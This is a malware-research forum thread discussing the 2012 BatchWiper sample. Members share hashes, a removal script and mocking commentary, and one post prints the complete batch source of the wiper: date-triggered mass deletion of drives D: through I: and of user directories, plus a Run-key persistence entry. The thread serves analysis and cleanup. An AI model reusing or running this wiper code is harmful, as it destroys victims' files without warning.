[dumb110]

http://certcc.ir/index.php?name=news&fi ... e&sid=2293

Any Samples?

[360Tencent]

...

http://blog.crysys.hu/2012/12/batchwiper/

one of them

Sleep.exe is basically a public tool available for batch programmers:
ftp://ftp.sac.sk/pub/sac/utiltask/sleep_47.zip

and the questions

a.) What is the dropper
b.) Is it surely an important attack, no matter how amateur the tools are?

[Xylitol]

i was sure someone will request this one, files in attach.

[EP_X0FF]

Does this trash really needs ANY attention? LMAO what a shit is that?

9b4db47010169a5d9a999dd36b0225b3d333220a16f5f58378a44b616e02cc04 is RAR SFX archive with rest of files inside.

2d9ae8e2cdae0496036eaa4a6e38442176e32e8a4eb04f38fdcf074ec8357db3
jucheck.bat

Code: Select all

@echo off & setlocal

sleep for 2
del "%systemroot%\system32\juboot.exe" /q /s /f
del "%userprofile%\Start Menu\Programs\Startup\GrooveMonitor.exe" /q /s /f

if "%date%"=="Mon 12/10/2012" goto yes
if "%date%"=="Tue 12/11/2012" goto yes
if "%date%"=="Wed 12/12/2012" goto yes

if "%date%"=="Mon 01/21/2013" goto yes
if "%date%"=="Tue 01/22/2013" goto yes
if "%date%"=="Wed 01/23/2013" goto yes

if "%date%"=="Mon 05/06/2013" goto yes
if "%date%"=="Tue 05/07/2013" goto yes
if "%date%"=="Wed 05/08/2013" goto yes

if "%date%"=="Mon 07/22/2013" goto yes
if "%date%"=="Tue 07/23/2013" goto yes
if "%date%"=="Wed 07/24/2013" goto yes

if "%date%"=="Mon 11/11/2013" goto yes
if "%date%"=="Tue 11/12/2013" goto yes
if "%date%"=="Wed 11/13/2013" goto yes

if "%date%"=="Mon 02/03/2014" goto yes
if "%date%"=="Tue 02/04/2014" goto yes
if "%date%"=="Wed 02/05/2014" goto yes

if "%date%"=="Mon 05/05/2014" goto yes
if "%date%"=="Tue 05/06/2014" goto yes
if "%date%"=="Wed 05/07/2014" goto yes

if "%date%"=="Mon 08/11/2014" goto yes
if "%date%"=="Tue 08/12/2014" goto yes
if "%date%"=="Wed 08/13/2014" goto yes

if "%date%"=="Mon 02/02/2015" goto yes
if "%date%"=="Tue 02/03/2015" goto yes
if "%date%"=="Wed 02/04/2015" goto yes

goto no

:yes

sleep for 3000
IF EXIST d:\ del "d:\*.*" /q /s /f
IF EXIST d:\ Chkdsk d:
IF EXIST e:\ del "e:\*.*" /q /s /f
IF EXIST e:\ Chkdsk e:
IF EXIST f:\ del "f:\*.*" /q /s /f
IF EXIST f:\ Chkdsk f:
IF EXIST g:\ del "g:\*.*" /q /s /f
IF EXIST g:\ Chkdsk g:
IF EXIST h:\ del "h:\*.*" /q /s /f
IF EXIST h:\ Chkdsk h:
IF EXIST i:\ del "i:\*.*" /q /s /f
IF EXIST i:\ Chkdsk i:

del "%userprofile%\Desktop\*.*" /q /s /f
\\start calc

:no

2dc6842bfa2e4b9cf634cfda7036ad7455c93471d91570646c51d866e71f5ee0
WmiPrv.bat

Code: Select all

@echo off & setlocal

sleep for 2
del "%systemroot%\system32\juboot.exe" /q /s /f
del "%userprofile%\Start Menu\Programs\Startup\GrooveMonitor.exe" /q /s /f
del "C:\Documents and Settings\All Users\Start Menu\Programs\Startup\GrooveMonitor.exe" /q /s /f

:loop
if "%date%"=="Mon 12/10/2012" goto yes
if "%date%"=="Tue 12/11/2012" goto yes
if "%date%"=="Wed 12/12/2012" goto yes

if "%date%"=="Mon 01/21/2013" goto yes
if "%date%"=="Tue 01/22/2013" goto yes
if "%date%"=="Wed 01/23/2013" goto yes

if "%date%"=="Mon 05/06/2013" goto yes
if "%date%"=="Tue 05/07/2013" goto yes
if "%date%"=="Wed 05/08/2013" goto yes

if "%date%"=="Mon 07/22/2013" goto yes
if "%date%"=="Tue 07/23/2013" goto yes
if "%date%"=="Wed 07/24/2013" goto yes

if "%date%"=="Mon 11/11/2013" goto yes
if "%date%"=="Tue 11/12/2013" goto yes
if "%date%"=="Wed 11/13/2013" goto yes

if "%date%"=="Mon 02/03/2014" goto yes
if "%date%"=="Tue 02/04/2014" goto yes
if "%date%"=="Wed 02/05/2014" goto yes

if "%date%"=="Mon 05/05/2014" goto yes
if "%date%"=="Tue 05/06/2014" goto yes
if "%date%"=="Wed 05/07/2014" goto yes

if "%date%"=="Mon 08/11/2014" goto yes
if "%date%"=="Tue 08/12/2014" goto yes
if "%date%"=="Wed 08/13/2014" goto yes

if "%date%"=="Mon 02/02/2015" goto yes
if "%date%"=="Tue 02/03/2015" goto yes
if "%date%"=="Wed 02/04/2015" goto yes

goto no

:yes

sleep for 3000
IF EXIST d:\ del "d:\*.*" /q /s /f
IF EXIST d:\ Chkdsk d:
IF EXIST e:\ del "e:\*.*" /q /s /f
IF EXIST e:\ Chkdsk e:
IF EXIST f:\ del "f:\*.*" /q /s /f
IF EXIST f:\ Chkdsk f:
IF EXIST g:\ del "g:\*.*" /q /s /f
IF EXIST g:\ Chkdsk g:
IF EXIST h:\ del "h:\*.*" /q /s /f
IF EXIST h:\ Chkdsk h:
IF EXIST i:\ del "i:\*.*" /q /s /f
IF EXIST i:\ Chkdsk i:

del "%userprofile%\*.*" /q /s /f
\\start calc
exit
:no
sleep for 3000
goto loop

c4b0b7f3ecd960e89891bbb1e0ce69bd1e3bf4826370e8ebe6bd250afba8c110
juboot.bat

Code: Select all

@echo off & setlocal
sleep for 2
REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v jucheck.exe /t REG_SZ /d "%systemroot%\system32\jucheck.exe" /f

start "" /D"%systemroot%\system32\" "jucheck.exe"

7f6999c8e3a9efa08cc6aac1ee22bab91566896f778d3bafdf7a5319de12ae1d
SLEEP.EXE - batch delay

WOW, just WOW. Super cyber weapon.

Despite its simplicity in design, the malware is efficient and can wipe disk partitions and user profile directories without being recognized by anti-virus software.

lolwut?

[hanan]

WOW, why you need a sample? write it for yourself! (just type randomly at the keyboard and you have something that's looks the same :))

[dumb110]

Yo dawg, I heard you like batch, so I made a batch for your batch.

Code: Select all

@echo off
:start
echo BatchWiper Removal Batch.
echo This will remove BatchWiper from your system and wipe the Temporary folder.
SET /P inp=Do you want to continue?
if %inp%==y goto remove
if %inp%==Y goto remove
if %inp%==n goto exit
if %inp%==N goto exit
goto start

:remove
echo Removing Startup Entry:
reg delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v jucheck.exe /f
echo Removing Files:
del %systemroot%\System32\jucheck.exe /f /q
del %systemroot%\System32\juboot.exe /f /q
del %systemroot%\System32\sleep.exe /f /q
echo Clearing Temporary Folder:
del %temp%\*.* /f /s /q
echo Done.
pause
goto exit

:exit
exit

[EP_X0FF]

Mad skillz.